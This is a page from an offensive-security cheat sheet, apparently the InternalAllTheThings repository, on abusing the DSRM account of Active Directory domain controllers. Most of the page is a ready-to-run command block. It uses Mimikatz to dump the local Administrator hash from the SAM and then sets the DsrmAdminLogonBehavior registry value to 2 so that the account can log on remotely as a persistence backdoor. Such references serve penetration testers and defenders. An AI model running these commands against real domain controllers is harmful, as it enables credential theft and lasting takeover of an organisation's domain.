pwd-dsrm-credentials.md (1341B)
1 --- 2 title: "Password - DSRM Credentials" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/pwd-dsrm-credentials.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-dsrm-credentials.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Password - DSRM Credentials 12 13 > Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database. 14 15 This is the local administrator account inside each DC. Having admin privileges in this machine, you can use Mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. 16 17 ```ps1 18 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' 19 20 # Check if the key exists and get the value 21 Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior 22 23 # Create key with value "2" if it doesn't exist 24 New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD 25 26 # Change value to "2" 27 Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 28 ```